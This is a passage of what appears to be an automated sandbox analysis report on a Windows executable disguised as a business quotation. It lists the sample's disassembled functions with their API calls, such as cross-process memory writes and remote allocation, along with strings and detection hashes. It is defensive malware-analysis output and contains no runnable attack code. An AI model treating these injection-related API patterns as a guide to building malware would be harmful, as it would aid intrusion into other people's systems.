                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3741023627-0
                                                                                                                    • Opcode ID: d9531f6a0ef2554f504a5a180bb44618de314dc33dd3e95b9c6eee6d67b49cbb
                                                                                                                    • Instruction ID: 6f1d2a870e4f9506a7a706ac398825199432af573d7e86e520111465300e9db1
                                                                                                                    • Opcode Fuzzy Hash: d9531f6a0ef2554f504a5a180bb44618de314dc33dd3e95b9c6eee6d67b49cbb
                                                                                                                    • Instruction Fuzzy Hash: 4801A970500B08ABEB219B20DD4EFA677B8BF01F05F04455AB587A11E1DBF4A994EFD1
                                                                                                                    Function 00F422A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00F422BE
                                                                                                                      • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
                                                                                                                      • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
                                                                                                                    • _free.LIBCMT ref: 00F422D0
                                                                                                                    • _free.LIBCMT ref: 00F422E3
                                                                                                                    • _free.LIBCMT ref: 00F422F4
                                                                                                                    • _free.LIBCMT ref: 00F42305
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: bee3a393de9961fc1f7995477c0bd5a6870adb9d79605d313cb3508eb05eed34
                                                                                                                    • Instruction ID: c8e76a838b4bc0aa0b08bf3240b5546a28a9261e68bc3f193f9962ec1af7b58d
                                                                                                                    • Opcode Fuzzy Hash: bee3a393de9961fc1f7995477c0bd5a6870adb9d79605d313cb3508eb05eed34
                                                                                                                    • Instruction Fuzzy Hash: 72F05E708011A99B9A52AF6ABC8180D3F79F718770784052BF810DA2B1CB761962FFE4
                                                                                                                    Function 00F295C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EndPath.GDI32(?), ref: 00F295D4
                                                                                                                    • StrokeAndFillPath.GDI32(?,?,00F671F7,00000000,?,?,?), ref: 00F295F0
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00F29603
                                                                                                                    • DeleteObject.GDI32 ref: 00F29616
                                                                                                                    • StrokePath.GDI32(?), ref: 00F29631
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2625713937-0
                                                                                                                    • Opcode ID: 89856cd60a6d6429b4651ce4d008c3cefcbbcb4992c2a3192ebecdd7ab0949dd
                                                                                                                    • Instruction ID: 92ea5225117b8b87342b3b51788b9cdb6800cdc140cebc8c6e589a3258cbcb5a
                                                                                                                    • Opcode Fuzzy Hash: 89856cd60a6d6429b4651ce4d008c3cefcbbcb4992c2a3192ebecdd7ab0949dd
                                                                                                                    • Instruction Fuzzy Hash: 20F0197140A24CEBDB125F66ED587683FA1BB02332F048214F5259A0F2CB748995FF60
                                                                                                                    Function 00F40F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __freea$_free
                                                                                                                    • String ID: a/p$am/pm
                                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                                    • Opcode ID: 448769b0a3d1e037c46d72151f2955b90d552e41c9e76eace3be73363ef2bd81
                                                                                                                    • Instruction ID: 321fb26060d3c1cd9bdd5d2c4d6e8a6de0bc2b22d2d49acfecf4a19528e3fa62
                                                                                                                    • Opcode Fuzzy Hash: 448769b0a3d1e037c46d72151f2955b90d552e41c9e76eace3be73363ef2bd81
                                                                                                                    • Instruction Fuzzy Hash: D1D10132E10206CADB288F68C845BFABFB5FF05720F284119ED11AB650D3759EC0EB91
                                                                                                                    Function 00F97B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F30242: EnterCriticalSection.KERNEL32(00FE070C,00FE1884,?,?,00F2198B,00FE2518,?,?,?,00F112F9,00000000), ref: 00F3024D
                                                                                                                      • Part of subcall function 00F30242: LeaveCriticalSection.KERNEL32(00FE070C,?,00F2198B,00FE2518,?,?,?,00F112F9,00000000), ref: 00F3028A
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F300A3: __onexit.LIBCMT ref: 00F300A9
                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00F97BFB
                                                                                                                      • Part of subcall function 00F301F8: EnterCriticalSection.KERNEL32(00FE070C,?,?,00F28747,00FE2514), ref: 00F30202
                                                                                                                      • Part of subcall function 00F301F8: LeaveCriticalSection.KERNEL32(00FE070C,?,00F28747,00FE2514), ref: 00F30235
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                    • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                                    • API String ID: 535116098-3733170431
                                                                                                                    • Opcode ID: 459c0396b387ac6bdf19dd423fc9e8e91bc2503279e05571becf267174afaabe
                                                                                                                    • Instruction ID: a5b1406ab118fa26158eac45566c1a89195efbbdd6c4b6a2b634f68e1f3d0859
                                                                                                                    • Opcode Fuzzy Hash: 459c0396b387ac6bdf19dd423fc9e8e91bc2503279e05571becf267174afaabe
                                                                                                                    • Instruction Fuzzy Hash: 03919A70A14309EFEF04EF54D891DADB7B1BF49310F14805AF806AB292DB71AE81EB51
                                                                                                                    Function 00F72716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F7B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F721D0,?,?,00000034,00000800,?,00000034), ref: 00F7B42D
                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F72760
                                                                                                                      • Part of subcall function 00F7B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00F7B3F8
                                                                                                                      • Part of subcall function 00F7B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00F7B355
                                                                                                                      • Part of subcall function 00F7B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F72194,00000034,?,?,00001004,00000000,00000000), ref: 00F7B365
                                                                                                                      • Part of subcall function 00F7B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F72194,00000034,?,?,00001004,00000000,00000000), ref: 00F7B37B
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F727CD
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F7281A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                    • Opcode ID: 68e0777a4737f76f9f31b9c35afe97247c75f016e7202fc14ac1f4462c5eecb7
                                                                                                                    • Instruction ID: 3fc7dcb9e90761a4a2a282c20088a0c255172ff833027c230992a008e3f1487c
                                                                                                                    • Opcode Fuzzy Hash: 68e0777a4737f76f9f31b9c35afe97247c75f016e7202fc14ac1f4462c5eecb7
                                                                                                                    • Instruction Fuzzy Hash: E9413D76900218AFDB10DFA4CD45BDEBBB8AF05310F008096FA59B7181DB716E85DBA2
                                                                                                                    Function 00F4172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe,00000104), ref: 00F41769
                                                                                                                    • _free.LIBCMT ref: 00F41834
                                                                                                                    • _free.LIBCMT ref: 00F4183E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                    • String ID: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe
                                                                                                                    • API String ID: 2506810119-2911666617
                                                                                                                    • Opcode ID: e6a2f8e39671edb357c365e1c1b8d5be3aa9975813e7ea65905bef7aa92f1412
                                                                                                                    • Instruction ID: 564c31fd9a81c2d03f14bd7d36cc01f086cec90a373b8722f7d0b25e067190af
                                                                                                                    • Opcode Fuzzy Hash: e6a2f8e39671edb357c365e1c1b8d5be3aa9975813e7ea65905bef7aa92f1412
                                                                                                                    • Instruction Fuzzy Hash: 86316D71E40258ABDB21DB9A9C85D9EBFFCFB85320B144166F904DB211D6748A80EBA0
                                                                                                                    Function 00F7C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F7C306
                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00F7C34C
                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FE1990,01235688), ref: 00F7C395
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                    • Opcode ID: 9418425d86968558b27d0b7d043510afd7e69be9ab469c359bd346532e6b0b43
                                                                                                                    • Instruction ID: a011dc5559757037ffb25608d12157f18f2ac47a076446645fa79e7724a8b870
                                                                                                                    • Opcode Fuzzy Hash: 9418425d86968558b27d0b7d043510afd7e69be9ab469c359bd346532e6b0b43
                                                                                                                    • Instruction Fuzzy Hash: AE4180716043019FD720DF25DC84B5ABBE8AF85320F14C61EF9A9972D1D774A904EBA3
                                                                                                                    Function 00FA4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FACC08,00000000,?,?,?,?), ref: 00FA44AA
                                                                                                                    • GetWindowLongW.USER32 ref: 00FA44C7
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA44D7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                    • Opcode ID: 5197c472d3aa40dc6c8d7fbb1a604fbca9ffc96f4610eb4eff143061b163f1b2
                                                                                                                    • Instruction ID: 79ba0c3d7692b236b78e4f96d71fba55838f8d9b2d7a7a01d8226453060c7424
                                                                                                                    • Opcode Fuzzy Hash: 5197c472d3aa40dc6c8d7fbb1a604fbca9ffc96f4610eb4eff143061b163f1b2
                                                                                                                    • Instruction Fuzzy Hash: 4B31ADB1610209AFDB20CE78DC45BEA77A9EB8A334F244725FD79921D0D7B4EC50AB50
                                                                                                                    Function 00F9304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F9335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00F93077,?,?), ref: 00F93378
                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F9307A
                                                                                                                    • _wcslen.LIBCMT ref: 00F9309B
                                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00F93106
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                    • String ID: 255.255.255.255
                                                                                                                    • API String ID: 946324512-2422070025
                                                                                                                    • Opcode ID: 15eb7203cbaa98695e5d9ebf7c3f79970c5011c1a0eb77742c85ad5ecdf06c9a
                                                                                                                    • Instruction ID: 6d8570df5e31715828995ec7eed822218ac04e502d04ae9da477e3a1d31f1f09
                                                                                                                    • Opcode Fuzzy Hash: 15eb7203cbaa98695e5d9ebf7c3f79970c5011c1a0eb77742c85ad5ecdf06c9a
                                                                                                                    • Instruction Fuzzy Hash: DF310935A042059FEF20CF68C885FAA77F0EF15328F148055E4158B3A2D775EE85E760
                                                                                                                    Function 00FA3EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00FA3F40
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00FA3F54
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA3F78
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: SysMonthCal32
                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                    • Opcode ID: adce138441961b48bc4e429b9ab0c445f0f4f37eb481a316235091da51bfea45
                                                                                                                    • Instruction ID: df1b8bfbfa1b1514ea5ab36645e366e6ccaafe2259b3d741888a592970b6ee0e
                                                                                                                    • Opcode Fuzzy Hash: adce138441961b48bc4e429b9ab0c445f0f4f37eb481a316235091da51bfea45
                                                                                                                    • Instruction Fuzzy Hash: 1821EF72A10219BFDF258F50CC42FEA3B79EB49724F110215FA196B1C0D6B5AC50AB90
                                                                                                                    Function 00FA4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FA4705
                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FA4713
                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FA471A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                    • Opcode ID: 29517373ca6321a0d199773c575b38d5b16382868d351a093d136aed793d3267
                                                                                                                    • Instruction ID: 044b72db6f69d005986c4175334305d8b7af9e246da320bb9c454e55af9c49bc
                                                                                                                    • Opcode Fuzzy Hash: 29517373ca6321a0d199773c575b38d5b16382868d351a093d136aed793d3267
                                                                                                                    • Instruction Fuzzy Hash: AD2130B5600248AFDB10DF64DCC1DAA37ADEB8A3A4B040059F5009B351D771FC51EA60
                                                                                                                    Function 00F795AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                    • API String ID: 176396367-2734436370
                                                                                                                    • Opcode ID: 75457574f454c1e3fa29f2b673f533ce6a8a419a60068f2742d1526f20c4678a
                                                                                                                    • Instruction ID: a5a843402d75626db021509b7fc077f354af0a4a214af554e5df91bd208b860a
                                                                                                                    • Opcode Fuzzy Hash: 75457574f454c1e3fa29f2b673f533ce6a8a419a60068f2742d1526f20c4678a
                                                                                                                    • Instruction Fuzzy Hash: 5221387250862166C331BA25DC02FB773E89F91320F148027F94D9B181EBD9AD85F297
                                                                                                                    Function 00FA37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00FA3840
                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00FA3850
                                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00FA3876
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                    • String ID: Listbox
